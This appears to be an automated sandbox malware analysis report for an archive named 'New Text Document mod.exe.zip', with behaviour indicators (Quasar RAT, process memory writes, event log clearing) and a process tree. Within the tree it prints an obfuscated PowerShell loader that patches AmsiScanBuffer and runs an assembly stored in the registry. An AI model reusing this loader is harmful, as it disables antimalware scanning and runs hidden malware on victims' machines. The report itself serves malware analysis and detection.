1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe Token: SeCreatePagefilePrivilege 1172 chrome.exe Token: SeShutdownPrivilege 1172 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3732 7zFM.exe 3732 7zFM.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 1172 chrome.exe 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 4068 chrome.exe 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE -
Suspicious use of SetWindowsHookEx 64 IoCs
pid Process 3416 chrome.exe 3416 chrome.exe 3416 chrome.exe 3416 chrome.exe 3416 chrome.exe 4536 Conhost.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2628 Conhost.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 3104 Conhost.exe 4248 Client-base.exe 2648 chrome.exe 2692 Conhost.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 2648 chrome.exe 3092 Conhost.exe 1824 Process not Found 5032 Conhost.exe 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 6140 Conhost.exe 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 3648 Explorer.EXE 296 Conhost.exe 3648 Explorer.EXE 3648 Explorer.EXE 2500 windows 3543.exe 2808 Conhost.exe 4324 Conhost.exe 4100 Conhost.exe 784 Conhost.exe 3184 Conhost.exe 988 Conhost.exe 5372 Conhost.exe 1612 Conhost.exe 3648 Explorer.EXE 5444 wudi.exe 5444 wudi.exe 5444 wudi.exe 5444 wudi.exe 5444 wudi.exe 5444 wudi.exe 5444 wudi.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1172 wrote to memory of 3408 1172 chrome.exe 83 PID 1172 wrote to memory of 3408 1172 chrome.exe 83 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 2372 1172 chrome.exe 84 PID 1172 wrote to memory of 3052 1172 chrome.exe 85 PID 1172 wrote to memory of 3052 1172 chrome.exe 85 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 PID 1172 wrote to memory of 5080 1172 chrome.exe 86 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
cURL User-Agent 2 IoCs
Uses User-Agent string associated with cURL utility.
description flow ioc HTTP User-Agent header 543 curl/8.7.1 HTTP User-Agent header 548 curl/8.7.1 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 drop1.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3454535599-122122096-1812617400-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 drop1.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:632
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1044
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1044 -s 37403⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5868
-
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:8 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 8 -s 33683⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2184
-
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3288 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3288 -s 21803⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2780
-
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:5668 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5668 -s 22123⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4132
-
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5869b339-3d00-4c85-a520-1acd26a5bb0f}2⤵PID:1820
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1424
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3900
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:900
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:640
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3376
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3980
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Modifies data under HKEY_USERS
PID:5872
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Modifies data under HKEY_USERS
PID:1636
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:980
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:412
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:924
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:976
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1052
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1288 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:2364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:lKCKFQoKATVM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$RyuhXVJbCZYpOe,[Parameter(Position=1)][Type]$BlSdxklQlE)$mHWCSEznCjI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+'f'+''+'l'+''+[Char](101)+''+'c'+''+[Char](116)+'e'+'d'+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'M'+[Char](101)+''+'m'+''+'o'+'r'+'y'+''+'M'+'o'+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('My'+[Char](68)+''+[Char](101)+'l'+[Char](101)+''+[Char](103)+''+'a'+''+'t'+''+'e'+''+'T'+''+[Char](121)+''+[Char](112)+''+[Char](101)+'','C'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+'Pu'+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+''+','+'A'+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$mHWCSEznCjI.DefineConstructor(''+[Char](82)+'TS'+[Char](112)+'eci'+[Char](97)+'l'+'N'+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+'id'+'e'+'B'+[Char](121)+'S'+[Char](105)+'g,'+[Char](80)+''+'u'+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$RyuhXVJbCZYpOe).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+'i'+'m'+'e'+','+''+[Char](77)+''+[Char](97)+''+'n'+'a'+'g'+''+'e'+''+'d'+'');$mHWCSEznCjI.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+'u'+'b'+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'H'+''+'i'+''+'d'+''+'e'+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'N'+'ew'+[Char](83)+''+[Char](108)+''+'o'+'t'+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$BlSdxklQlE,$RyuhXVJbCZYpOe).SetImplementationFlags(''+[Char](82)+'unt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+'e'+'d');Write-Output $mHWCSEznCjI.CreateType();}$RvPFxEcjYtyex=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+''+'d'+'ll')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+''+'o'+'f'+'t'+''+'.'+'Win'+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+'e'+''+[Char](78)+''+'a'+'t'+'i'+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$ZnClGxpuxiTnOl=$RvPFxEcjYtyex.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'Pr'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+''+'r'+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+'c'+[Char](44)+''+'S'+'t'+'a'+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zOMHvHwOyueUXqQNShm=lKCKFQoKATVM @([String])([IntPtr]);$rdwvIxYUdlVFDCAKKpqzKW=lKCKFQoKATVM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$krmtmibTqFE=$RvPFxEcjYtyex.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+'o'+'d'+'u'+[Char](108)+''+[Char](101)+''+[Char](72)+'an'+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object]('k'+'e'+'rn'+[Char](101)+'l'+[Char](51)+'2'+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$dCcHKMsdmHkfsQ=$ZnClGxpuxiTnOl.Invoke($Null,@([Object]$krmtmibTqFE,[Object]('L'+'o'+''+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+''+[Char](114)+'a'+'r'+'y'+[Char](65)+'')));$QbyqljjoHJMhBuQmo=$ZnClGxpuxiTnOl.Invoke($Null,@([Object]$krmtmibTqFE,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'P'+'r'+'o'+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$Osnrhrm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dCcHKMsdmHkfsQ,$zOMHvHwOyueUXqQNShm).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+''+[Char](46)+'d'+'l'+'l');$izcXrPtwAKBKYigfU=$ZnClGxpuxiTnOl.Invoke($Null,@([Object]$Osnrhrm,[Object](''+[Char](65)+''+[Char](109)+'s'+'i'+''+[Char](83)+'c'+'a'+'n'+'B'+'uf'+[Char](102)+''+[Char](101)+''+'r'+'')));$VWchyhqDGx=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QbyqljjoHJMhBuQmo,$rdwvIxYUdlVFDCAKKpqzKW).Invoke($izcXrPtwAKBKYigfU,[uint32]8,4,[ref]$VWchyhqDGx);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$izcXrPtwAKBKYigfU,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QbyqljjoHJMhBuQmo,$rdwvIxYUdlVFDCAKKpqzKW).Invoke($izcXrPtwAKBKYigfU,[uint32]8,0x20,[ref]$VWchyhqDGx);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'FT'+[Char](87)+'AR'+[Char](69)+'').GetValue(''+'$'+'L'+[Char](77)+''+[Char](88)+''+'s'+''+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
PID:4452 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5100
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1460
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1488
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1500
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1536
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1656
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2800
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2680
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:840
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:3048
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2892
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:1788
-
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:1848
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1700
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1744
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1768
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1896
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2036
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1260
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2012
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2060
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2120
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /R /T2⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:3804
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2260
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2344
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2424
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2860
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2924
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2932
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3212
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3224
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3544
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3648 -
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe.zip"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Quasar RAT
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffef00dcc40,0x7ffef00dcc4c,0x7ffef00dcc583⤵PID:3408
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2036,i,16450066801561252560,3324363905703384995,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=2028 /prefetch:23⤵PID:2372
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1928,i,16450066801561252560,3324363905703384995,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=2116 /prefetch:33⤵PID:3052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2280,i,16450066801561252560,3324363905703384995,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=2300 /prefetch:83⤵PID:5080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,16450066801561252560,3324363905703384995,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3172 /prefetch:13⤵PID:4100
-
-
